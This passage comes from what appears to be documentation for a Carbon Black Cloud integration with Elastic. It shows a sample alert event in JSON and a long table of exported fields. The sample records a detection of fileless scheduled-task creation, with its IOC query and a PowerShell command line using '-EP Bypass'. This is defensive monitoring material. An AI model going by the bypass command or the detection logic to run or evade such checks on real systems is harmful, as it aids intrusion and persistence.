following: | user.name.text | Multi-field of `user.name`. | match_only_text | +### Alert + +This is the `alert_v7` dataset. + +An example event for `alert_v7` looks as following: + +```json +{ + "@timestamp": "2024-03-13T08:02:36.578Z", + "agent": { + "ephemeral_id": "9c46ff77-c269-4593-a3d8-efd89fbdca66", + "id": "db2930ff-774e-4541-bcd4-1a6a1d656167", + "name": "docker-fleet-agent", + "type": "filebeat", + "version": "8.12.1" + }, + "carbon_black_cloud": { + "alert": { + "alert_notes_present": false, + "backend_timestamp": "2024-03-13T08:03:29.540Z", + "backend_update_timestamp": "2024-03-13T08:03:29.540Z", + "category": "THREAT", + "determination": { + "change_timestamp": "2024-03-13T08:03:29.540Z", + "changed_by": "ALERT_CREATION", + "changed_by_type": "SYSTEM", + "value": "NONE" + }, + "device": { + "external_ip": "75.98.230.194", + "internal_ip": "172.16.100.140", + "location": "UNKNOWN", + "os": "WINDOWS", + "policy": "default", + "policy_id": 6525, + "target_value": "MEDIUM" + }, + "ioc": { + "hit": "(fileless_scriptload_cmdline:Register-ScheduledTask OR fileless_scriptload_cmdline:New-ScheduledTask OR scriptload_content:Register-ScheduledTask OR scriptload_content:New-ScheduledTask) AND NOT (process_cmdline:windows\\\\ccm\\\\systemtemp OR crossproc_name:windows\\\\ccm\\\\ccmexec.exe OR (process_publisher:\"VMware, Inc.\" AND process_publisher_state:FILE_SIGNATURE_STATE_TRUSTED))", + "id": "d1080521-e617-4e45-94e0-7a145c62c90a" + }, + "is_updated": false, + "mdr": { + "alert": false, + "alert_notes_present": false, + "threat_notes_present": false + }, + "ml_classification_final_verdict": "NOT_ANOMALOUS", + "ml_classification_global_prevalence": "LOW", + "ml_classification_org_prevalence": "LOW", + "organization_key": "7DESJ9GN", + "parent": { + "cmdline": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule", + "effective_reputation": "TRUSTED_WHITE_LIST", + "guid": "7DESJ9GN-0064e5a7-0000077c-00000000-1da5ed7ec07b275", + "hash": { + "md5": "145dcf6706eeea5b066885ee17964c09", + "sha256": "f13de58416730d210dab465b242e9c949fb0a0245eef45b07c381f0c6c8a43c3" + }, + "name": "c:\\windows\\system32\\svchost.exe", + "pid": 1916, + "reputation": "TRUSTED_WHITE_LIST", + "username": "NT AUTHORITY\\SYSTEM" + }, + "policy_applied": "NOT_APPLIED", + "primary_event_id": "re9M9hp8TbGLqyk6QXqQqA-0", + "process": { + "cmdline": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -EP Bypass \\\\eip.demo\\sysvol\\EIP.DEMO\\scripts\\Luminol.ps1", + "effective_reputation": "TRUSTED_WHITE_LIST", + "guid": "7DESJ9GN-0064e5a7-00001434-00000000-1da751c7354ebfe", + "hash": { + "md5": "2e5a8590cf6848968fc23de3fa1e25f1", + "sha256": "9785001b0dcf755eddb8af294a373c0b87b2498660f724e76c4d53f9c217c7a3" + }, + "issuer": [ + "Microsoft Windows Production PCA 2011" + ], + "name": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", + "pid": 5172, + "publisher": [ + "Microsoft Windows" + ], + "reputation": "TRUSTED_WHITE_LIST", + "username": "NT AUTHORITY\\SYSTEM" + }, + "reason_code": "c21ca826-573a-3d97-8c1e-93c8471aab7f:8033b29d-81d2-3c47-82d2-f4a7f398b85d", + "report": { + "description": "Newer Powershell versions introduced built-in cmdlets to manage scheduled tasks natively without calling out to typical scheduled task processes like at.exe or schtasks.exe. This detection looks for behaviors related to the fileless execution of scheduled tasks. If you are responding to this alert, be sure to correlate the fileless scriptload events with events typically found in your environment Generally, attackers will create scheduled tasks with binaries that are located in user writable directories like AppData, Temp, or public folders.", + "id": "LrKOC7DtQbm4g8w0UFruQg-d1080521-e617-4e45-94e0-7a145c62c90a", + "link": "https://attack.mitre.org/techniques/T1053/", + "name": "Execution - AMSI - New Fileless Scheduled Task Behavior Detected", + "tags": [ + "execution", + "privesc", + "persistence", + "t1053", + "windows", + "amsi", + "attack", + "attackframework" + ] + }, + "run_state": "RAN", + "sensor_action": "ALLOW", + "threat_id": "C21CA826573A8D974C1E93C8471AAB7F", + "threat_notes_present": false, + "type": "WATCHLIST", + "url": "defense.conferdeploy.net/alerts?s[c][query_string]=id:1c6aba68-24cc-41e3-ad8e-4b545a587b55&orgKey=7DESJ9GN", + "watchlists": [ + { + "id": "Ci7w5B4URg6HN60hatQMQ", + "name": "AMSI Threat Intelligence" + } + ], + "workflow": { + "change_timestamp": "2024-03-13T08:03:29.540Z", + "changed_by": "ALERT_CREATION", + "changed_by_type": "SYSTEM", + "closure_reason": "NO_REASON", + "status": "OPEN" + } + } + }, + "data_stream": { + "dataset": "carbon_black_cloud.alert_v7", + "namespace": "ep", + "type": "logs" + }, + "ecs": { + "version": "8.11.0" + }, + "elastic_agent": { + "id": "db2930ff-774e-4541-bcd4-1a6a1d656167", + "snapshot": false, + "version": "8.12.1" + }, + "event": { + "agent_id_status": "verified", + "dataset": "carbon_black_cloud.alert_v7", + "end": "2024-03-13T08:00:09.894Z", + "id": "1c6aba68-24cc-41e3-ad8e-4b545a587b55", + "ingested": "2024-04-10T09:06:02Z", + "kind": "alert", + "original": "{\"alert_notes_present\":false,\"alert_url\":\"defense.conferdeploy.net/alerts?s[c][query_string]=id:1c6aba68-24cc-41e3-ad8e-4b545a587b55\\u0026orgKey=7DESJ9GN\",\"asset_group\":[],\"backend_timestamp\":\"2024-03-13T08:03:29.540Z\",\"backend_update_timestamp\":\"2024-03-13T08:03:29.540Z\",\"childproc_cmdline\":\"\",\"childproc_guid\":\"\",\"childproc_username\":\"\",\"detection_timestamp\":\"2024-03-13T08:02:36.578Z\",\"determination\":{\"change_timestamp\":\"2024-03-13T08:03:29.540Z\",\"changed_by\":\"ALERT_CREATION\",\"changed_by_type\":\"SYSTEM\",\"value\":\"NONE\"},\"device_external_ip\":\"75.98.230.194\",\"device_id\":6612391,\"device_internal_ip\":\"172.16.100.140\",\"device_location\":\"UNKNOWN\",\"device_name\":\"EIP\\\\WW-20002\",\"device_os\":\"WINDOWS\",\"device_os_version\":\"Windows 10 x64\",\"device_policy\":\"default\",\"device_policy_id\":6525,\"device_target_value\":\"MEDIUM\",\"device_uem_id\":\"\",\"device_username\":\"EIP\\\\Administrator\",\"first_event_timestamp\":\"2024-03-13T08:00:09.894Z\",\"id\":\"1c6aba68-24cc-41e3-ad8e-4b545a587b55\",\"ioc_hit\":\"(fileless_scriptload_cmdline:Register-ScheduledTask OR fileless_scriptload_cmdline:New-ScheduledTask OR scriptload_content:Register-ScheduledTask OR scriptload_content:New-ScheduledTask) AND NOT (process_cmdline:windows\\\\\\\\ccm\\\\\\\\systemtemp OR crossproc_name:windows\\\\\\\\ccm\\\\\\\\ccmexec.exe OR (process_publisher:\\\"VMware, Inc.\\\" AND process_publisher_state:FILE_SIGNATURE_STATE_TRUSTED))\",\"ioc_id\":\"d1080521-e617-4e45-94e0-7a145c62c90a\",\"is_updated\":false,\"last_event_timestamp\":\"2024-03-13T08:00:09.894Z\",\"mdr_alert\":false,\"mdr_alert_notes_present\":false,\"mdr_threat_notes_present\":false,\"ml_classification_anomalies\":[],\"ml_classification_final_verdict\":\"NOT_ANOMALOUS\",\"ml_classification_global_prevalence\":\"LOW\",\"ml_classification_org_prevalence\":\"LOW\",\"org_key\":\"7DESJ9GN\",\"parent_cmdline\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Schedule\",\"parent_effective_reputation\":\"TRUSTED_WHITE_LIST\",\"parent_guid\":\"7DESJ9GN-0064e5a7-0000077c-00000000-1da5ed7ec07b275\",\"parent_md5\":\"145dcf6706eeea5b066885ee17964c09\",\"parent_name\":\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"parent_pid\":1916,\"parent_reputation\":\"TRUSTED_WHITE_LIST\",\"parent_sha256\":\"f13de58416730d210dab465b242e9c949fb0a0245eef45b07c381f0c6c8a43c3\",\"parent_username\":\"NT AUTHORITY\\\\SYSTEM\",\"policy_applied\":\"NOT_APPLIED\",\"primary_event_id\":\"re9M9hp8TbGLqyk6QXqQqA-0\",\"process_cmdline\":\"\\\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\" -EP Bypass \\\\\\\\eip.demo\\\\sysvol\\\\EIP.DEMO\\\\scripts\\\\Luminol.ps1\",\"process_effective_reputation\":\"TRUSTED_WHITE_LIST\",\"process_guid\":\"7DESJ9GN-0064e5a7-00001434-00000000-1da751c7354ebfe\",\"process_issuer\":[\"Microsoft Windows Production PCA 2011\"],\"process_md5\":\"2e5a8590cf6848968fc23de3fa1e25f1\",\"process_name\":\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"process_pid\":5172,\"process_publisher\":[\"Microsoft Windows\"],\"process_reputation\":\"TRUSTED_WHITE_LIST\",\"process_sha256\":\"9785001b0dcf755eddb8af294a373c0b87b2498660f724e76c4d53f9c217c7a3\",\"process_username\":\"NT AUTHORITY\\\\SYSTEM\",\"reason\":\"Process powershell.exe was detected by the report \\\"Execution - AMSI - New Fileless Scheduled Task Behavior Detected\\\" in watchlist \\\"AMSI Threat Intelligence\\\"\",\"reason_code\":\"c21ca826-573a-3d97-8c1e-93c8471aab7f:8033b29d-81d2-3c47-82d2-f4a7f398b85d\",\"report_description\":\"Newer Powershell versions introduced built-in cmdlets to manage scheduled tasks natively without calling out to typical scheduled task processes like at.exe or schtasks.exe. This detection looks for behaviors related to the fileless execution of scheduled tasks. If you are responding to this alert, be sure to correlate the fileless scriptload events with events typically found in your environment Generally, attackers will create scheduled tasks with binaries that are located in user writable directories like AppData, Temp, or public folders.\",\"report_id\":\"LrKOC7DtQbm4g8w0UFruQg-d1080521-e617-4e45-94e0-7a145c62c90a\",\"report_link\":\"https://attack.mitre.org/techniques/T1053/\",\"report_name\":\"Execution - AMSI - New Fileless Scheduled Task Behavior Detected\",\"report_tags\":[\"execution\",\"privesc\",\"persistence\",\"t1053\",\"windows\",\"amsi\",\"attack\",\"attackframework\"],\"run_state\":\"RAN\",\"sensor_action\":\"ALLOW\",\"severity\":5,\"tags\":null,\"threat_id\":\"C21CA826573A8D974C1E93C8471AAB7F\",\"threat_notes_present\":false,\"type\":\"WATCHLIST\",\"user_update_timestamp\":null,\"watchlists\":[{\"id\":\"Ci7w5B4URg6HN60hatQMQ\",\"name\":\"AMSI Threat Intelligence\"}],\"workflow\":{\"change_timestamp\":\"2024-03-13T08:03:29.540Z\",\"changed_by\":\"ALERT_CREATION\",\"changed_by_type\":\"SYSTEM\",\"closure_reason\":\"NO_REASON\",\"status\":\"OPEN\"}}", + "reason": "Process powershell.exe was detected by the report \"Execution - AMSI - New Fileless Scheduled Task Behavior Detected\" in watchlist \"AMSI Threat Intelligence\"", + "severity": 5, + "start": "2024-03-13T08:00:09.894Z" + }, + "host": { + "hostname": "WW-20002", + "id": "6612391", + "name": "WW-20002", + "os": { + "type": "windows", + "version": "Windows 10 x64" + } + }, + "input": { + "type": "cel" + }, + "process": { + "command_line": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -EP Bypass \\\\eip.demo\\sysvol\\EIP.DEMO\\scripts\\Luminol.ps1", + "entity_id": "7DESJ9GN-0064e5a7-00001434-00000000-1da751c7354ebfe", + "executable": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", + "hash": { + "md5": "2e5a8590cf6848968fc23de3fa1e25f1", + "sha256": "9785001b0dcf755eddb8af294a373c0b87b2498660f724e76c4d53f9c217c7a3" + }, + "name": "powershell.exe", + "parent": { + "command_line": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule", + "entity_id": "7DESJ9GN-0064e5a7-0000077c-00000000-1da5ed7ec07b275", + "executable": "c:\\windows\\system32\\svchost.exe", + "hash": { + "md5": "145dcf6706eeea5b066885ee17964c09", + "sha256": "f13de58416730d210dab465b242e9c949fb0a0245eef45b07c381f0c6c8a43c3" + }, + "name": "svchost.exe", + "pid": 1916 + }, + "pid": 5172 + }, + "related": { + "hash": [ + "f13de58416730d210dab465b242e9c949fb0a0245eef45b07c381f0c6c8a43c3", + "145dcf6706eeea5b066885ee17964c09", + "9785001b0dcf755eddb8af294a373c0b87b2498660f724e76c4d53f9c217c7a3", + "2e5a8590cf6848968fc23de3fa1e25f1" + ], + "hosts": [ + "WW-20002", + "EIP" + ], + "user": [ + "Administrator" + ] + }, + "tags": [ + "preserve_original_event", + "forwarded", + "carbon_black_cloud-alert" + ], + "user": { + "domain": "EIP", + "name": "Administrator" + } +} +``` + +**Exported fields** + +| Field | Description | Type | +|---|---|---| +| @timestamp | Event timestamp. | date | +| carbon_black_cloud.alert.additional_events_present | Indicator to let API and forwarder users know that they should look up other associated events related to this alert. | boolean | +| carbon_black_cloud.alert.alert_notes_present | Indicates if notes are associated with the alert. | boolean | +| carbon_black_cloud.alert.attack_tactic | S tactic from the MITRE ATT&CK framework. | keyword | +| carbon_black_cloud.alert.attack_technique | Technique from the MITRE ATT&CK framework. | keyword | +| carbon_black_cloud.alert.backend_timestamp | Timestamp when the alert was first detected by the Carbon Black Cloud backend, it is a ISO 8601 UTC timestamp. | date | +| carbon_black_cloud.alert.backend_update_timestamp | The last time the alert was updated in Carbon Black Cloud, it is a ISO 8601 UTC timestamp. | date | +| carbon_black_cloud.alert.blocked_process.effective_reputation | Effective reputation of the blocked file or process; applied by the sensor at the time the block occurred. | keyword | +| carbon_black_cloud.alert.blocked_process.hash.md5 | MD5 hash of the child process binary; for any process terminated by the sensor. | keyword | +| carbon_black_cloud.alert.blocked_process.hash.sha256 | SHA-256 hash of the child process binary; for any process terminated by the sensor. | keyword | +| carbon_black_cloud.alert.blocked_process.name | Tokenized file path of the files blocked by sensor action. | keyword | +| carbon_black_cloud.alert.category | The category of the alert. | keyword | +| carbon_black_cloud.alert.childproc.cmdline | Command line executed by the child process. | keyword | +| carbon_black_cloud.alert.childproc.effective_reputation | Effective reputation of the child process hash. | keyword | +| carbon_black_cloud.alert.childproc.guid | Guid of the child process that has fired the alert. | keyword | +| carbon_black_cloud.alert.childproc.hash.md5 | MD5 hash of the child process. | keyword | +| carbon_black_cloud.alert.childproc.hash.sha256 | SHA-256 hash of the child process. | keyword | +| carbon_black_cloud.alert.childproc.name | Filesystem path of the child process binary. | keyword | +| carbon_black_cloud.alert.childproc.username | User context in which the child process was executed. | keyword | +| carbon_black_cloud.alert.connection_type | The type of network connection (e.g., EGRESS, INGRESS). | keyword | +| carbon_black_cloud.alert.determination.change_timestamp | Timestamp of the determination change | date | +| carbon_black_cloud.alert.determination.changed_by | Entity that changed the determination | keyword | +| carbon_black_cloud.alert.determination.changed_by_type | Type of entity that changed the determination | keyword | +| carbon_black_cloud.alert.determination.value | Value of the determination | keyword | +| carbon_black_cloud.alert.device.external_ip | IP address of the endpoint according to the Carbon Black Cloud; can differ from device_internal_ip due to network proxy or NAT. | keyword | +| carbon_black_cloud.alert.device.internal_ip | IP address of the endpoint reported by the sensor. | keyword | +| carbon_black_cloud.alert.device.location | Whether the device was on or off premises when the alert started, based on the current IP address and the device’s registered DNS domain suffix. | keyword | +| carbon_black_cloud.alert.device.os | OS of the device. | keyword | +| carbon_black_cloud.alert.device.policy | The name of the device policy associated with the device at the time of the alert. | keyword | +| carbon_black_cloud.alert.device.policy_id | The identifier for the device policy associated with the device at the time of the alert. | integer | +| carbon_black_cloud.alert.device.target_value | Target value assigned to the device, set from the policy. | keyword | +| carbon_black_cloud.alert.device.uem_id | Device correlation with WS1/EUC, required for our Workspace ONE Intelligence integration to function. | keyword | +| carbon_black_cloud.alert.egress_group_id | The unique identifier of the egress group associated with the event. | keyword | +| carbon_black_cloud.alert.egress_group_name | The name of the egress group associated with the event. | keyword | +| carbon_black_cloud.alert.ioc.field | The field the indicator of comprise (IOC) hit contains. | keyword | +| carbon_black_cloud.alert.ioc.hit | IOC field value or IOC query that matches. | keyword | +| carbon_black_cloud.alert.ioc.id | The identifier of the IOC that cause the hit. | keyword | +| carbon_black_cloud.alert.ip_reputation | The reputation score of the IP address associated with the event. | integer | +| carbon_black_cloud.alert.is_updated | Set to true if this is an updated copy of the alert initiated by the Carbon Black Cloud backend. | boolean | +| carbon_black_cloud.alert.k8s_cluster | The Kubernetes cluster associated with the event. | keyword | +| carbon_black_cloud.alert.k8s_kind | The type of Kubernetes resource associated with the event (e.g., Pod, DaemonSet). | keyword | +| carbon_black_cloud.alert.k8s_namespace | The Kubernetes namespace associated with the event. | keyword | +| carbon_black_cloud.alert.k8s_pod_name | The name of the Kubernetes pod associated with the event. | keyword | +| carbon_black_cloud.alert.k8s_policy | The name of the Kubernetes policy associated with the event. | keyword | +| carbon_black_cloud.alert.k8s_policy_id | The unique identifier of the Kubernetes policy associated with the event. | keyword | +| carbon_black_cloud.alert.k8s_rule | The name of the Kubernetes rule associated with the event. | keyword | +| carbon_black_cloud.alert.k8s_rule_id | The unique identifier of the Kubernetes rule associated with the event. | keyword | +| carbon_black_cloud.alert.k8s_workload_name | The name of the Kubernetes workload associated with the event. | keyword | +| carbon_black_cloud.alert.mdr.alert | Is the alert eligible for review by Carbon Black MDR Analysts. | boolean | +| carbon_black_cloud.alert.mdr.alert_notes_present | Customer visible notes at the alert level that were added by a MDR analyst. | boolean | +| carbon_black_cloud.alert.mdr.classification.change_timestamp | WWhen the last MDR classification change occurred, it is a ISO 8601 UTC timestamp. | date | +| carbon_black_cloud.alert.mdr.determination.change_timestamp | When the last MDR classification change occurred, it is a ISO 8601 UTC timestamp. | date | +| carbon_black_cloud.alert.mdr.determination.value | A record that identifies the whether the alert was determined to represent a likely or unlikely threat. | keyword | +| carbon_black_cloud.alert.mdr.threat_notes_present | Customer visible notes at the threat level that were added by a MDR analyst. | boolean | +| carbon_black_cloud.alert.mdr.workflow.change_timestamp | WWhen the last MDR status change occurred, it is a ISO 8601 UTC timestamp. | date | +| carbon_black_cloud.alert.mdr.workflow.is_assigned | If the workflow is assigned or not. | boolean | +| carbon_black_cloud.alert.mdr.workflow.status | Primary value used to capture status change during MD Analyst's alert triage. | boolean | +| carbon_black_cloud.alert.ml_classification_anomalies | An list of anomalies detected by the machine learning classification. | keyword | +| carbon_black_cloud.alert.ml_classification_final_verdict | Final verdict of the alert, based on the ML models that were used to make the prediction. | keyword | +| carbon_black_cloud.alert.ml_classification_global_prevalence | Categories (low/medium/high) used to describe the prevalence of alerts across all regional organizations. | keyword | +| carbon_black_cloud.alert.ml_classification_org_prevalence | TCategories (low/medium/high) used to describe the prevalence of alerts within an organization. | keyword | +| carbon_black_cloud.alert.netconn.local_ip | IP address of the local side of the network connection. | ip | +| carbon_black_cloud.alert.netconn.local_ipv4 | IPv4 address of the local side of the network connection. | ip | +| carbon_black_cloud.alert.netconn.local_ipv6 | IPv6 address of the local side of the network connection. | ip | +| carbon_black_cloud.alert.netconn.local_port | TCP or UDP port used by the local side of the network connection. | integer | +| carbon_black_cloud.alert.netconn.protocol | Network protocol of the network connection. | keyword | +| carbon_black_cloud.alert.netconn.remote_domain | Domain name (FQDN) associated with the remote end of the network connection. | keyword | +| carbon_black_cloud.alert.netconn.remote_ip | IP address of the remote side of the network connection. | ip | +| carbon_black_cloud.alert.netconn.remote_ipv4 | IPv4 address of the remote side of the network connection. | ip | +| carbon_black_cloud.alert.netconn.remote_ipv6 | IPv6 address of the remote side of the network connection. | ip | +| carbon_black_cloud.alert.netconn.remote_port | TCP or UDP port used by the remote side of the network connection; same as netconn_port and event_network_remote_port. | integer | +| carbon_black_cloud.alert.org_feature_entitlement | The feature entitlement of the organization. | keyword | +| carbon_black_cloud.alert.organization_key | The unique identifier for the organization associated with the alert. | keyword | +| carbon_black_cloud.alert.parent.cmdline | Command line executed by the parent process. | keyword | +| carbon_black_cloud.alert.parent.effective_reputation | Effective reputation of the parent hash. | keyword | +| carbon_black_cloud.alert.parent.guid | Guid of the parent process that has fired the alert. | keyword | +| carbon_black_cloud.alert.parent.hash.md5 | MD5 hash of the parent process. | keyword | +| carbon_black_cloud.alert.parent.hash.sha256 | SHA-256 hash of the parent process. | keyword | +| carbon_black_cloud.alert.parent.name | Filesystem path of the parent process binary. | keyword | +| carbon_black_cloud.alert.parent.pid | PID of the parent process that has fired the alert. | long | +| carbon_black_cloud.alert.parent.reputation | Reputation of the parent process; applied when event is processed by the Carbon Black Cloud. | keyword | +| carbon_black_cloud.alert.parent.username | User context in which the parent process was executed. | keyword | +| carbon_black_cloud.alert.policy_applied | Whether a policy was applied. | keyword | +| carbon_black_cloud.alert.primary_event_id | ID of the primary event in the alert. | keyword | +| carbon_black_cloud.alert.process.cmdline | Command line executed by the actor process. | keyword | +| carbon_black_cloud.alert.process.effective_reputation | Effective reputation of the actor hash. | keyword | +| carbon_black_cloud.alert.process.guid | Guid of the process that has fired the alert. | keyword | +| carbon_black_cloud.alert.process.hash.md5 | MD5 hash of the process. | keyword | +| carbon_black_cloud.alert.process.hash.sha256 | SHA-256 hash of the process. | keyword | +| carbon_black_cloud.alert.process.issuer | The certificate authority associated with the process's certificate. | keyword | +| carbon_black_cloud.alert.process.name | Filesystem path of the actor process binary. | keyword | +| carbon_black_cloud.alert.process.pid | PID of the process that has fired the alert. | long | +| carbon_black_cloud.alert.process.publisher | Publisher name on the certificate used to sign the Windows or macOS process binary. | keyword | +| carbon_black_cloud.alert.process.reputation | Reputation of the actor process; applied when event is processed by the Carbon Black Cloud. | keyword | +| carbon_black_cloud.alert.process.username | User context in which the actor process was executed. | keyword | +| carbon_black_cloud.alert.product_id | The hexadecimal id of the USB device's product. | keyword | +| carbon_black_cloud.alert.product_name | The name of the USB device's vendor. | keyword | +| carbon_black_cloud.alert.reason | A spoken language written explanation of the what and why the alert occurred and any action taken. | keyword | +| carbon_black_cloud.alert.reason_code | Shorthand enum for the full-text reason. | keyword | +| carbon_black_cloud.alert.remote_is_private | Indicates whether the remote IP address is private or not. | boolean | +| carbon_black_cloud.alert.report.description | Description of the IOC report associated with the alert. | keyword | +| carbon_black_cloud.alert.report.id | The identifier of the report that contains the IOC. | keyword | +| carbon_black_cloud.alert.report.link | Link of reports that contained the IOC that caused a hit. | keyword | +| carbon_black_cloud.alert.report.name | The name of the report that contains the IOC. | keyword | +| carbon_black_cloud.alert.report.tags | Tags associated with the IOC report. | keyword | +| carbon_black_cloud.alert.rule_category_id | ID representing the category of the rule_id for certain alert types. | keyword | +| carbon_black_cloud.alert.rule_config_id | ID of the rule configuration that triggered an alert. | keyword | +| carbon_black_cloud.alert.rule_config_name | Name of the rule configuration that triggered an alert. | keyword | +| carbon_black_cloud.alert.rule_config_type | Type of the rule configuration that triggered an alert. | keyword | +| carbon_black_cloud.alert.rule_id | ID of the rule that triggered an alert. | keyword | +| carbon_black_cloud.alert.run_state | Whether the threat in the alert ran. | keyword | +| carbon_black_cloud.alert.sensor_action | The action taken by the sensor, according to the rule of the policy. | keyword | +| carbon_black_cloud.alert.serial_number | The serial number of the USB device. | keyword | +| carbon_black_cloud.alert.status | status of alert. | keyword | +| carbon_black_cloud.alert.tags | Tags associated with the alert. | keyword | +| carbon_black_cloud.alert.threat_category | Categories of threats which we were able to take action on. | keyword | +| carbon_black_cloud.alert.threat_id | The identifier of a threat which this alert belongs. Threats are comprised of a combination of factors that can be repeated across devices. | keyword | +| carbon_black_cloud.alert.threat_name | Name of the threat. | keyword | +| carbon_black_cloud.alert.threat_notes_present | Indicates if notes are associated with the threat_id. | boolean | +| carbon_black_cloud.alert.tms_rule_id | Threat intrusion detection id. | keyword | +| carbon_black_cloud.alert.ttps | Other potential malicious activities involved in a threat. | keyword | +| carbon_black_cloud.alert.type | Type of alert. | keyword | +| carbon_black_cloud.alert.url | Link to the alerts page for this alert. Does not vary by alert type. | keyword | +| carbon_black_cloud.alert.user_update_timestamp | Timestamp of the last property of an alert changed by a user, such as the alert workflow or determination, it is a ISO 8601 UTC timestamp. | date | +| carbon_black_cloud.alert.vendor_id | The hexadecimal id of the USB device's vendor. | keyword | +| carbon_black_cloud.alert.vendor_name | The name of the USB device's vendor. | keyword | +| carbon_black_cloud.alert.version | The version of the schema being emitted. | keyword | +| carbon_black_cloud.alert.watchlists.id | Identifier of the watchlist. | keyword | +| carbon_black_cloud.alert.watchlists.name | Name of the watchlist. | keyword | +| carbon_black_cloud.alert.workflow.change_timestamp | The last change/update time of workflow. | date | +| carbon_black_cloud.alert.workflow.changed_by | The name of process which changed the workflow. | keyword | +| carbon_black_cloud.alert.workflow.changed_by_autoclose_rule_id | The rule id that auto closed the workflow. | keyword | +| carbon_black_cloud.alert.workflow.changed_by_type | The type of user who changed the workflow. | keyword | +| carbon_black_cloud.alert.workflow.closure_reason | Reason for which the workflow was closed. | keyword | +| carbon_black_cloud.alert.workflow.status | The status of the workflow. | keyword | +| cloud.account.id | The cloud account or organization id used to identify different entities in a multi-tenant environment. Examples: AWS account id, Google Cloud ORG Id, or other unique identifier. | keyword | +| cloud.availability_zone | Availability zone in which this host is running. | keyword | +| cloud.image.id | Image ID for the cloud instance. | keyword | +| cloud.instance.id | Instance ID of the host machine. | keyword | +| cloud.instance.name | Instance name of the host machine. | keyword | +| cloud.machine.type | Machine type of the host machine. | keyword | +| cloud.project.id | Name of the project in Google Cloud. | keyword | +| cloud.provider | Name of the cloud provider. Example values are aws, azure, gcp, or digitalocean. | keyword | +| cloud.region | Region in which this host is running. | keyword | +| container.id | Unique container id. | keyword | +| container.image.name | Name of the image the container was built on. | keyword | +| container.labels | Image labels. | object | +| container.name | Container name. | keyword | +| data_stream.dataset | Data stream dataset. | constant_keyword | +| data_stream.namespace | Data stream namespace. | constant_keyword | +| data_stream.type | Data stream type. | constant_keyword | +| ecs.version | ECS version this event conforms to. `ecs.version` is a required field and must exist in all events. When querying across multiple indices -- which may conform to slightly different ECS versions -- this field lets integrations adjust to the schema version of the events. | keyword | +| event.created | `event.created` contains the date/time when the event was first read by an agent, or by your pipeline. This field is distinct from `@timestamp` in that `@timestamp` typically contain the time extracted from the original event. In most situations, these two timestamps will be slightly different. The difference can be used to calculate the delay between your source generating an event, and the time when your agent first processed it. This can be used to monitor your agent's or pipeline's ability to keep up with your event source. In case the two timestamps are identical, `@timestamp` should be used. | date | +| event.dataset | Event dataset. | constant_keyword | +| event.end | `event.end` contains the date when the event ended or when the activity was last observed. | date | +| event.id | Unique ID to describe the event. | keyword | +| event.kind | This is one of four ECS Categorization Fields, and indicates the highest level in the ECS category hierarchy. `event.kind` gives high-level information about what type of information the event contains, without being specific to the contents of the event. For example, values of this field distinguish alert events from metric events. The value of this field can be used to inform how these kinds of events should be handled. They may warrant different retention, different access control, it may also help understand whether the data is coming in at a regular interval or not. | keyword | +| event.module | Event module. | constant_keyword | +| event.original | Raw text message of entire event. Used to demonstrate log integrity or where the full log message (before splitting it up in multiple parts) may be required, e.g. for reindex. This field is not indexed and doc_values are disabled. It cannot be searched, but it can be retrieved from `_source`. If users wish to override this and index this field, please see `Field data types` in the `Elasticsearch Reference`. | keyword | +| event.reason | Reason why this event happened, according to the source. This describes the why of a particular action or outcome captured in the event. Where `event.action` captures the action from the event, `event.reason` describes why that action was taken. For example, a web proxy with an `event.action` which denied the request may also populate `event.reason` with the reason why (e.g. `blocked site`). | keyword | +| event.severity | The numeric severity of the event according to your event source. What the different severity values mean can be different between sources and use cases. It's up to the implementer to make sure severities are consistent across events from the same source. The Syslog severity belongs in `log.syslog.severity.code`. `event.severity` is meant to represent the severity according to the event source (e.g. firewall, IDS). If the event source does not publish its own severity, you may optionally copy the `log.syslog.severity.code` to `event.severity`. | long | +| event.start | `event.start` contains the date when the event started or when the activity was first observed. | date | +| host.architecture | Operating system architecture. | keyword | +| host.containerized | If the host is a container. | boolean | +| host.domain | Name of the domain of which the host is a member. For example, on Windows this could be the host's Active Directory domain or NetBIOS domain name. For Linux this could be the domain of the host's LDAP provider. | keyword | +| host.mac | Host mac addresses. | keyword | +| host.os.build | OS build information. | keyword | +| host.os.codename | OS codename, if any. | keyword | +| host.os.family | OS family (such as redhat, debian, freebsd, windows). | keyword | +| host.os.kernel | Operating system kernel version as a raw string. | keyword | +| host.os.name | Operating system name, without the version. | keyword | +| host.os.name.text | Multi-field of `host.os.name`. | text | +| host.os.platform | Operating system platform (such centos, ubuntu, windows). | keyword | +| host.type | Type of host. For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment. | keyword | +| input.type | Input type | keyword | +| log.offset | Log offset | long | +| process.command_line | Full command line that started the process, including the absolute path to the executable, and all arguments. Some arguments may be filtered to protect sensitive information. | wildcard | +| process.command_line.text | Multi-field of `process.command_line`. | match_only_text | +| process.entity_id | Unique identifier for the process. The implementation of this is specified by the data source, but some examples of what could be used here are a process-generated UUID, Sysmon Process GUIDs, or a hash of some uniquely identifying components of a process. Constructing a globally unique identifier is a common practice to mitigate PID reuse as well as to identify a specific process over time, across multiple monitored hosts. | keyword | +| process.executable | Absolute path to the process executable. | keyword | +| process.executable.text | Multi-field of `process.executable`. | match_only_text | +| process.hash.md5 | MD5 hash. | keyword | +| process.hash.sha256 | SHA256 hash. | keyword | +| process.name | Process name. Sometimes called program name or similar. | keyword | +| process.name.text | Multi-field of `process.name`. | match_only_text | +| process.parent.command_line | Full command line that started the process, including the absolute path to the executable, and all arguments. Some arguments may be filtered to protect sensitive information. | wildcard | +| process.parent.command_line.text | Multi-field of `process.parent.command_line`. | match_only_text | +| process.parent.entity_id | Unique identifier for the process. The implementation of this is specified by the data source, but some examples of what could be used here are a process-generated UUID, Sysmon Process GUIDs, or a hash of some uniquely identifying components of a process. Constructing a globally unique identifier is a common practice to mitigate PID reuse as well as to identify a specific process over time, across multiple monitored hosts. | keyword | +| 